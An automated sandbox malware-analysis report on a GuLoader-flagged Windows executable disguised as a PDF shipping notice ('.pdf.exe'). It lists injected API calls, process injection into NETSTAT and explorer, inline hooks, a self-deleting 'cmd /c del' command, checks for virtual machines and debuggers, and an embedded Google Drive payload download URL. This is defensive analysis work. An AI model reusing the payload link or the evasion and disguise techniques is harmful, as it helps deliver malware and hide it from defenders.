Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32BE0 NtQueryVirtualMemory, 6_2_1EA32BE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B20 NtQueryInformationProcess, 6_2_1EA32B20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA32B00 NtQueryValueKey, 6_2_1EA32B00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA338D0 NtGetContextThread, 6_2_1EA338D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA329D0 NtWaitForSingleObject, 6_2_1EA329D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA334E0 NtCreateMutant, 6_2_1EA334E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA34570 NtSuspendThread, 6_2_1EA34570
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA34260 NtSetContextThread, 6_2_1EA34260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF34E0 NtCreateMutant,LdrInitializeThunk, 8_2_02FF34E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2A80 NtClose,LdrInitializeThunk, 8_2_02FF2A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2BC0 NtQueryInformationToken,LdrInitializeThunk, 8_2_02FF2BC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B90 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_02FF2B90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B80 NtCreateKey,LdrInitializeThunk, 8_2_02FF2B80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_02FF2B10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B00 NtQueryValueKey,LdrInitializeThunk, 8_2_02FF2B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF29F0 NtReadFile,LdrInitializeThunk, 8_2_02FF29F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E50 NtCreateSection,LdrInitializeThunk, 8_2_02FF2E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2F00 NtCreateFile,LdrInitializeThunk, 8_2_02FF2F00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2CF0 NtDelayExecution,LdrInitializeThunk, 8_2_02FF2CF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C30 NtMapViewOfSection,LdrInitializeThunk, 8_2_02FF2C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_02FF2DC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2D10 NtQuerySystemInformation,LdrInitializeThunk, 8_2_02FF2D10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF4260 NtSetContextThread, 8_2_02FF4260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF4570 NtSuspendThread, 8_2_02FF4570
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2AC0 NtEnumerateValueKey, 8_2_02FF2AC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2AA0 NtQueryInformationFile, 8_2_02FF2AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2A10 NtWriteFile, 8_2_02FF2A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2BE0 NtQueryVirtualMemory, 8_2_02FF2BE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2B20 NtQueryInformationProcess, 8_2_02FF2B20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF38D0 NtGetContextThread, 8_2_02FF38D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF29D0 NtWaitForSingleObject, 8_2_02FF29D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2ED0 NtResumeThread, 8_2_02FF2ED0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2EC0 NtQuerySection, 8_2_02FF2EC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2EB0 NtProtectVirtualMemory, 8_2_02FF2EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E80 NtCreateProcessEx, 8_2_02FF2E80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2E00 NtQueueApcThread, 8_2_02FF2E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2FB0 NtSetValueKey, 8_2_02FF2FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2F30 NtOpenDirectoryObject, 8_2_02FF2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2CD0 NtEnumerateKey, 8_2_02FF2CD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF3C90 NtOpenThread, 8_2_02FF3C90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C50 NtUnmapViewOfSection, 8_2_02FF2C50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF3C30 NtOpenProcessToken, 8_2_02FF3C30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C20 NtSetInformationFile, 8_2_02FF2C20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2C10 NtOpenProcess, 8_2_02FF2C10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2DA0 NtReadVirtualMemory, 8_2_02FF2DA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FF2D50 NtWriteVirtualMemory, 8_2_02FF2D50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A350 NtCreateFile, 8_2_0281A350
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A480 NtClose, 8_2_0281A480
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A400 NtReadFile, 8_2_0281A400
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A530 NtAllocateVirtualMemory, 8_2_0281A530
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A3FA NtReadFile, 8_2_0281A3FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281A52A NtAllocateVirtualMemory, 8_2_0281A52A
Sample file is different than original file name gathered from version info
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301549558.000000000042C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000000.22296662367.000000000042C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22830890524.000000001EC90000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Binary or memory string: OriginalFilenameBEGRLIGHED.exe vs Arrival Notice, CIA Awb Inv Form.pdf.exe
PE file contains strange resources
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: edgegdi.dll
PE / OLE file has an invalid certificate
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: invalid certificate
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Virustotal: Detection: 37%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe ReversingLabs: Detection: 31%
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process created: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File created: C:\Users\user\AppData\Local\Temp\~DF37AB796C0CD232D7.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@23/11
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_03
Source: Binary string: netstat.pdbGCTL source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: netstat.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22815632150.00000000000D0000.00000040.00020000.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817948839.0000000000981000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22826316782.000000001E660000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Arrival Notice, CIA Awb Inv Form.pdf.exe, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22827147286.000000001E9C0000.00000040.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22829090825.000000001EAED000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000000.22299792619.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.22302999330.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_00403EA8 push es; ret 1_2_00403EB7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_00406105 pushfd ; ret 1_2_00406106
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_004057C0 push esp; ret 1_2_004057C1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B63C50 pushad ; retf 1_2_02B63C51
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6593E push di; ret 1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6590E push di; ret 1_2_02B65969
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B65372 pushfd ; ret 1_2_02B65379
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6255E push edx; retf 1_2_02B6255F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1E9F08CD push ecx; mov dword ptr [esp], ecx 6_2_1E9F08D6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_005740AC push 8482D2CCh; retf 6_2_005740B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02FB08CD push ecx; mov dword ptr [esp], ecx 8_2_02FB08D6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281C0DA push edx; ret 8_2_0281C0DE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_028171D9 push es; retf 8_2_028171DA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4A5 push eax; ret 8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4F2 push eax; ret 8_2_0281D4F8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D4FB push eax; ret 8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281D55C push eax; ret 8_2_0281D562
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281696B push ebp; ret 8_2_0281696C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0281DE1A push ss; iretd 8_2_0281DE21

Persistence and Installation Behavior:

Creates processes with suspicious names
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File created: \arrival notice, cia awb inv form.pdf.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: /c del "C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe"
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=16IGYRUBEYI1SLH2LFQBJS2GGTY9BFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE(Q^
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep count: 160 > 30
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep time: -320000s >= -30000s
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432 Thread sleep count: 111 > 30
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 4432 Thread sleep time: -222000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6CE40 rdtsc 6_2_1EA6CE40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe System information queried: ModuleInformation
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707817785.000000001066F000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22301946477.00000000005E4000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe(Q^
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22305245204.0000000004DD0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWlS
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW@
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000001.00000002.22306338830.0000000005289000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818768645.00000000025C9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA6CE40 rdtsc 6_2_1EA6CE40
Enables debug privileges
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6F8FD mov eax, dword ptr fs:[00000030h] 1_2_02B6F8FD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B718FC mov eax, dword ptr fs:[00000030h] 1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B70232 mov eax, dword ptr fs:[00000030h] 1_2_02B70232
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 1_2_02B6C602 mov eax, dword ptr fs:[00000030h] 1_2_02B6C602
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA2CEA0 mov eax, dword ptr fs:[00000030h] 6_2_1EA2CEA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h] 6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EAB0EAD mov eax, dword ptr fs:[00000030h] 6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov eax, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe Code function: 6_2_1EA01EB2 mov ecx, dword ptr fs:[00000030h] 6_2_1EA01EB2
